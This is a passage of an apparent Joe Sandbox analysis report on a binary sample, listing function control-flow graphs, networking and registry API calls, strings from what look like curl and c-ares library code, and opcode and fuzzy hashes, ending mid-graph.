1614 e00a87-e00a97 call e06df0 1599->1614 1601->1596 1606 e00852 1602->1606 1607 e00a9c-e00aa4 1602->1607 1606->1594 1611 e00854-e0085f 1606->1611 1607->1561 1612 e00970-e00975 1608->1612 1613 e00893-e008b1 1608->1613 1611->1608 1615 e00a19-e00a2c 1612->1615 1616 e0097b-e00989 call df70b0 1612->1616 1617 e008c8-e008f7 1613->1617 1614->1561 1615->1586 1616->1615 1624 e0098f-e0099e 1616->1624 1625 e008f9-e008fb 1617->1625 1626 e008fd-e00925 1617->1626 1627 e009b0-e009c1 call df70d0 1624->1627 1628 e00928-e0093f 1625->1628 1626->1628 1634 e009a0-e009ae call df70e0 1627->1634 1635 e009c3-e009c7 1627->1635 1632 e008b3-e008c2 1628->1632 1633 e00945-e0096b 1628->1633 1632->1612 1632->1617 1633->1632 1634->1615 1634->1627 1637 e009e8-e00a03 WSAEnumNetworkEvents 1635->1637 1638 e009d0-e009e6 WSAEventSelect 1637->1638 1639 e00a05-e00a17 1637->1639 1638->1634 1638->1637 1639->1638
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00E00712
                                                              • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00E009DC
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00E009FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: multi.c
                                                              • API String ID: 2170980988-214371023
                                                              • Opcode ID: c393cb248ec465c74649a13199ea898589f49b5fca2ce87a1c1e9f96a309ddd6
                                                              • Instruction ID: 9b3d07009b5d5b9682dd4ccc10570586cd1ffa3934853a8c357e6a4b782efbdd
                                                              • Opcode Fuzzy Hash: c393cb248ec465c74649a13199ea898589f49b5fca2ce87a1c1e9f96a309ddd6
                                                              • Instruction Fuzzy Hash: ABD1D1756083019FE710DF64C881BBB77E5FF94348F08982DF984A6281E774E994CB62
                                                              Function 00EBB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1678 ebb180-ebb195 1679 ebb19b-ebb1a2 1678->1679 1680 ebb3e0-ebb3e7 1678->1680 1681 ebb1b0-ebb1b9 1679->1681 1681->1681 1682 ebb1bb-ebb1bd 1681->1682 1682->1680 1683 ebb1c3-ebb1d0 1682->1683 1685 ebb3db 1683->1685 1686 ebb1d6-ebb1f2 1683->1686 1685->1680 1687 ebb229-ebb22d 1686->1687 1688 ebb3e8-ebb417 1687->1688 1689 ebb233-ebb246 1687->1689 1696 ebb41d-ebb429 1688->1696 1697 ebb582-ebb589 1688->1697 1690 ebb248-ebb24b 1689->1690 1691 ebb260-ebb264 1689->1691 1692 ebb24d-ebb256 1690->1692 1693 ebb215-ebb223 1690->1693 1695 ebb269-ebb286 call ebaf30 1691->1695 1692->1695 1693->1687 1699 ebb315-ebb33c call 1178b00 1693->1699 1706 ebb288-ebb2a3 call ebb060 1695->1706 1707 ebb2f0-ebb301 1695->1707 1701 ebb42b-ebb433 call ebb590 1696->1701 1702 ebb435-ebb44c call ebb590 1696->1702 1709 ebb3bf-ebb3ca 1699->1709 1710 ebb342-ebb347 1699->1710 1701->1702 1718 ebb458-ebb471 call ebb590 1702->1718 1719 ebb44e-ebb456 call ebb590 1702->1719 1724 ebb2a9-ebb2c7 getsockname call ebb020 1706->1724 1725 ebb200-ebb213 call ebb020 1706->1725 1707->1693 1721 ebb307-ebb310 1707->1721 1720 ebb3cc-ebb3d9 1709->1720 1715 ebb349-ebb358 1710->1715 1716 ebb384-ebb38f 1710->1716 1722 ebb360-ebb382 1715->1722 1716->1709 1723 ebb391-ebb3a5 1716->1723 1734 ebb48c-ebb4a7 1718->1734 1735 ebb473-ebb487 1718->1735 1719->1718 1720->1680 1721->1720 1722->1716 1722->1722 1729 ebb3b0-ebb3bd 1723->1729 1736 ebb2cc-ebb2dd 1724->1736 1725->1693 1729->1709 1729->1729 1738 ebb4a9-ebb4b1 call ebb660 1734->1738 1739 ebb4b3-ebb4cb call ebb660 1734->1739 1735->1697 1736->1693 1740 ebb2e3 1736->1740 1738->1739 1745 ebb4d9-ebb4f5 call ebb660 1739->1745 1746 ebb4cd-ebb4d5 call ebb660 1739->1746 1740->1721 1751 ebb50d-ebb52b call ebb770 * 2 1745->1751 1752 ebb4f7-ebb50b 1745->1752 1746->1745 1751->1697 1757 ebb52d-ebb531 1751->1757 1752->1697 1758 ebb533-ebb53b 1757->1758 1759 ebb580 1757->1759 1760 ebb578-ebb57e 1758->1760 1761 ebb53d-ebb547 1758->1761 1759->1697 1760->1697 1761->1760 1762 ebb549-ebb54d 1761->1762 1762->1760 1763 ebb54f-ebb558 1762->1763 1763->1760 1764 ebb55a-ebb576 call ebb870 * 2 1763->1764 1764->1697 1764->1760
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 00EBB2B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: 8aa98c063ca760ded8cbecd6fa4ce7ede3216f5d8862dd5df18127488c11096b
                                                              • Instruction ID: c86e2167413549f1bd35dfd46861eac2e31c29966b67f2c85abfbb0af3a517f9
                                                              • Opcode Fuzzy Hash: 8aa98c063ca760ded8cbecd6fa4ce7ede3216f5d8862dd5df18127488c11096b
                                                              • Instruction Fuzzy Hash: F3C180716053059FD718DF24C881AAB77E2FF88308F04996DE84AAB3A1D7B0ED45CB81
                                                              Function 00E06FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e07d98a1f01282a5522a5e6e87bc09612aaf38f5991972628d50a3c3acc5fa9f
                                                              • Instruction ID: b3e965320fabe52d61acf32e5545ab7674c547d9e875b1a37941d1299d564180
                                                              • Opcode Fuzzy Hash: e07d98a1f01282a5522a5e6e87bc09612aaf38f5991972628d50a3c3acc5fa9f
                                                              • Instruction Fuzzy Hash: A1911530A0D3494BE7358A6888947BB72D5EFD4328F14AB2CE8D8631D4EB74BCD1D691
                                                              Function 00EBA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00EA712E,?,?,?,00001001,00000000), ref: 00EBA90D
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: e345fe33121241ee31f30e8b17c8d156f60ab8d3678aa8734df8131c04d4aba7
                                                              • Instruction ID: 978b849c02909f1b47ef27222af94452dcab22a90b368ff435b52bc7beb55484
                                                              • Opcode Fuzzy Hash: e345fe33121241ee31f30e8b17c8d156f60ab8d3678aa8734df8131c04d4aba7
                                                              • Instruction Fuzzy Hash: 80F06D75108308BFD6209F01EC88DABBBEDEFC9758F05496DF948232118270AE10DAB2
                                                              Function 00EAA440 Relevance: 48.3, APIs: 19, Strings: 8, Instructions: 1066registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00EAAA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00EAAA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00EAAA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00EAAAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00EAAB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 00EAAB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00EAAB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00EAAC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00EAAD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 00EAAD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 00EAADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 00EAAE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00EAAE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00EAAE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00EAAF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00EAAFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00EAB072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-1047472027
                                                              • Opcode ID: a72ca7a6ac1e9edb09efcbe16d0933120d511db56da16e433a7f5bffd0d65840
                                                              • Instruction ID: db92699a8b65a5e338cfad31effcd3a768fc98a00bac9bbca35e034ebed08b44
                                                              • Opcode Fuzzy Hash: a72ca7a6ac1e9edb09efcbe16d0933120d511db56da16e433a7f5bffd0d65840
                                                              • Instruction Fuzzy Hash: D872A271604301AFE7209F24CC85F6BB7E8AF99704F18682CF985AB291E775E944CB53
                                                              Function 00E2A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00E2A832
                                                              Strings
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00E2A6CE
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 00E2AE1F
                                                              • @, xrefs: 00E2AC42
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 00E2ADAC
                                                              • bind failed with errno %d: %s, xrefs: 00E2B080
                                                              • cf-socket.c, xrefs: 00E2A5CD, 00E2A735
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 00E2A796
                                                              • @, xrefs: 00E2A8F4
                                                              • Trying [%s]:%d..., xrefs: 00E2A689
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00E2AD0A
                                                              • Bind to local port %d failed, trying next, xrefs: 00E2AFE5
                                                              • Local port: %hu, xrefs: 00E2AF28
                                                              • Trying %s:%d..., xrefs: 00E2A7C2, 00E2A7DE
                                                              • Could not set TCP_NODELAY: %s, xrefs: 00E2A871
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 00E2AE60
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: 7b6c29d0159a09d4f17e8f2948c4eb19312a619f02c0032ed0b3cdceb907647d
                                                              • Instruction ID: fddc5420d7d1997aa89b54cee51adb481b2ce705a8930c9f86b3637a548ba3ca
                                                              • Opcode Fuzzy Hash: 7b6c29d0159a09d4f17e8f2948c4eb19312a619f02c0032ed0b3cdceb907647d
                                                              • Instruction Fuzzy Hash: 65620871504341ABE721CF14DC46BABB7E5BF84318F08692DF988A7292E771E845CB93
                                                              Function 00EB9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 859 eb9740-eb975b 860 eb975d-eb9768 call eb78a0 859->860 861 eb9780-eb9782 859->861 869 eb99bb-eb99c0 860->869 870 eb976e-eb9770 860->870 863 eb9788-eb97a0 call 1178e00 call eb78a0 861->863 864 eb9914-eb994e call 1178b70 RegOpenKeyExA 861->864 863->869 876 eb97a6-eb97c5 863->876 873 eb995a-eb9992 RegQueryValueExA RegCloseKey call 1178b98 864->873 874 eb9950-eb9955 864->874 877 eb9a0c-eb9a15 869->877 875 eb9772-eb977e 870->875 870->876 889 eb9997-eb99b5 call eb78a0 873->889 874->877 875->863 882 eb9827-eb9833 876->882 883 eb97c7-eb97e0 876->883 885 eb985f-eb9872 call eb5ca0 882->885 886 eb9835-eb985c call eae2b0 * 2 882->886 887 eb97e2-eb97f3 call 1178b50 883->887 888 eb97f6-eb9809 883->888 900 eb9878-eb987d call eb77b0 885->900 901 eb99f0 885->901 886->885 887->888 888->882 899 eb980b-eb9810 888->899 889->869 889->876 899->882 904 eb9812-eb9822 899->904 908 eb9882-eb9889 900->908 903 eb99f5-eb99fb call eb5d00 901->903 914 eb99fe-eb9a09 903->914 904->877 908->903 909 eb988f-eb989b call ea4fe0 908->909 909->901 917 eb98a1-eb98c3 call 1178b50 call eb78a0 909->917 914->877 923 eb98c9-eb98db call eae2d0 917->923 924 eb99c2-eb99ed call eae2b0 * 2 917->924 923->924 929 eb98e1-eb98f0 call eae2d0 923->929 924->901 929->924 935 eb98f6-eb9905 call eb63f0 929->935 939 eb990b-eb990f 935->939 940 eb9f66-eb9f7f call eb5d00 935->940 941 eb9a3f-eb9a5a call eb6740 call eb63f0 939->941 940->914 941->940 948 eb9a60-eb9a6e call eb6d60 941->948 951 eb9a1f-eb9a39 call eb6840 call eb63f0 948->951 952 eb9a70-eb9a94 call eb6200 call eb67e0 call eb6320 948->952 951->940 951->941 963 eb9a16-eb9a19 952->963 964 eb9a96-eb9ac6 call ead120 952->964 963->951 965 eb9fc1 963->965 970 eb9ac8-eb9adb call ead120 964->970 971 eb9ae1-eb9af7 call ead190 964->971 968 eb9fc5-eb9ffd call eb5d00 call eae2b0 * 2 965->968 968->914 970->951 970->971 971->951 978 eb9afd-eb9b09 call ea4fe0 971->978 978->965 983 eb9b0f-eb9b29 call eae730 978->983 988 eb9b2f-eb9b3a call eb78a0 983->988 989 eb9f84-eb9f88 983->989 988->989 996 eb9b40-eb9b54 call eae760 988->996 991 eb9f95-eb9f99 989->991 993 eb9f9b-eb9f9e 991->993 994 eb9fa0-eb9fb6 call eaebf0 * 2 991->994 993->965 993->994 1006 eb9fb7-eb9fbe 994->1006 1002 eb9f8a-eb9f92 996->1002 1003 eb9b5a-eb9b6e call eae730 996->1003 1002->991 1009 eb9b8c-eb9b97 call eb63f0 1003->1009 1010 eb9b70-eba004 1003->1010 1006->965 1018 eb9c9a-eb9cab call eaea00 1009->1018 1019 eb9b9d-eb9bbf call eb6740 call eb63f0 1009->1019 1015 eba015-eba01d 1010->1015 1016 eba01f-eba022 1015->1016 1017 eba024-eba045 call eaebf0 * 2 1015->1017 1016->968 1016->1017 1017->968 1028 eb9f31-eb9f35 1018->1028 1029 eb9cb1-eb9ccd call eaea00 call eae960 1018->1029 1019->1018 1036 eb9bc5-eb9bda call eb6d60 1019->1036 1031 eb9f40-eb9f61 call eaebf0 * 2 1028->1031 1032 eb9f37-eb9f3a 1028->1032 1045 eb9ccf 1029->1045 1046 eb9cfd-eb9d0e call eae960 1029->1046 1031->951 1032->951 1032->1031 1036->1018 1048 eb9be0-eb9bf4 call eb6200 call eb67e0 1036->1048 1049 eb9cd1-eb9cec call eae9f0 call eae4a0 1045->1049 1057 eb9d53-eb9d55 1046->1057 1058 eb9d10 1046->1058 1048->1018 1064 eb9bfa-eb9c0b call eb6320 1048->1064 1070 eb9cee-eb9cfb call eae9d0 1049->1070 1071 eb9d47-eb9d51 1049->1071 1061 eb9e69-eb9e8e call eaea40 call eae440 1057->1061 1062 eb9d12-eb9d2d call eae9f0 call eae4a0 1058->1062 1087 eb9e90-eb9e92 1061->1087 1088 eb9e94-eb9eaa call eae3c0 1061->1088 1084 eb9d5a-eb9d6f call eae960 1062->1084 1085 eb9d2f-eb9d3c call eae9d0 1062->1085 1079 eb9c11-eb9c1c call eb7b70 1064->1079 1080 eb9b75-eb9b86 call eaea00 1064->1080 1070->1046 1070->1049 1076 eb9dca-eb9ddb call eae960 1071->1076 1097 eb9e2e-eb9e36 1076->1097 1098 eb9ddd-eb9ddf 1076->1098 1079->1009 1104 eb9c22-eb9c33 call eae960 1079->1104 1080->1009 1100 eb9f2d 1080->1100 1116 eb9dc2 1084->1116 1117 eb9d71-eb9d73 1084->1117 1085->1062 1113 eb9d3e-eb9d42 1085->1113 1094 eb9eb3-eb9ec4 call eae9c0 1087->1094 1109 eba04a-eba04c 1088->1109 1110 eb9eb0-eb9eb1 1088->1110 1094->951 1119 eb9eca-eb9ed0 1094->1119 1106 eb9e38-eb9e3b 1097->1106 1107 eb9e3d-eb9e5b call eaebf0 * 2 1097->1107 1101 eb9e06-eb9e21 call eae9f0 call eae4a0 1098->1101 1100->1028 1142 eb9e23-eb9e2c call eaeac0 1101->1142 1143 eb9de1-eb9dee call eaec80 1101->1143 1129 eb9c66-eb9c75 call eb78a0 1104->1129 1130 eb9c35 1104->1130 1106->1107 1108 eb9e5e-eb9e67 1106->1108 1107->1108 1108->1061 1108->1094 1122 eba04e-eba051 1109->1122 1123 eba057-eba070 call eaebf0 * 2 1109->1123 1110->1094 1113->1061 1116->1076 1124 eb9d9a-eb9db5 call eae9f0 call 